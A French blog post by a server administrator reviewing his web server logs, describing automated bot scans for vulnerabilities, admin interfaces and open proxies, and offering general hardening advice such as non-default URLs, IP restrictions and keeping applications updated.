Première chose qui me choque, c'est le nombre de tentatives de connexions à du streaming. En regardant de plus prés, toutes ces urls proviennent d'une ip du réseau local de scaleway (l'endroit où ce serveur est hébergé). Sans chercher plus loin, en filtrant toutes les requêtes de cette ip de la liste, on la réduit à 200 urls restantes. Pourquoi on a cherché un serveur de streaming sur mon instance ? Je ne sais pas. En tout cas, je vais garder ça comme anecdote rigolote à sortir pendant un repas avec des admins sys.

Dans le reste de la liste, il ne reste plus que deux autres types de requêtes grossièrement : Des recherches de failles et de proxy.


Pour les recherches de failles, il y a de nombreux bots sur internet qui fouillent les serveurs à la recherche de problèmes de sécurité non corrigées (comme Shellshock par exemple). Ils vont aussi chercher des applications critiques comme des interfaces web de base de données ou des interface d'administration. Même si vous êtes protégé des attaques, je vous déconseille fortement de laisser ce genre d'application en accès sur une url standard. Il suffit qu'un 0day soit trouvé pour qu'on exploite votre serveur.

Les requêtes qui testent la présence d'une application servent à deux choses :

  • Tester la présence d'une faille dans la version installée.
  • Avoir un pool de machines exploitables si une nouvelle faille est trouvée.

Si vous avez un service comme phpmyadmin ou une interface d'administration web, essayez de faire en sorte que l'application n'utilise pas une url par défaut et que l'accès soit limité par IP en plus des mots de passe habituels. La limitation par IP n'est pas toujours possible mais faites le le plus souvent possible ! Ça peut sauver des serveurs !


C'est en regardant ces logs, que j'ai découvert cette histoire de recherche de proxy. Le principe semble simple, ils essayent de demander au serveur d’appeler leur page. Si ça répond et que la réponse correspond, ça veut dire que votre serveur peut être exploité comme un serveur proxy. Les requêtes sont souvent en POST, il y a surement dans le corps de la requête une tentative d'exploitation d'une faille.

Ça pourrait être intéressant de tenter de faire tourner une machine en laissant la faille se faire exploiter pour voir un peu le genre de trafic qui passe par là. Encore plus drôle si après on ajoute un filtrage à la volée du contenu. Imaginez un proxy qui mélange les lettres de tous les mots ou qui simplement fait une redirection vers votre site perso. Ça se tente :D.


La morale de cette analyse de mes logs est : La moindre faille de sécurité de votre serveur est testée automatiquement par des bots sur internet. Faites attention à ne pas laisser en public des applications web critiques et de bien garder à jour toutes vos applications en public. L'internet est sans pitié pour les administrateurs de serveurs.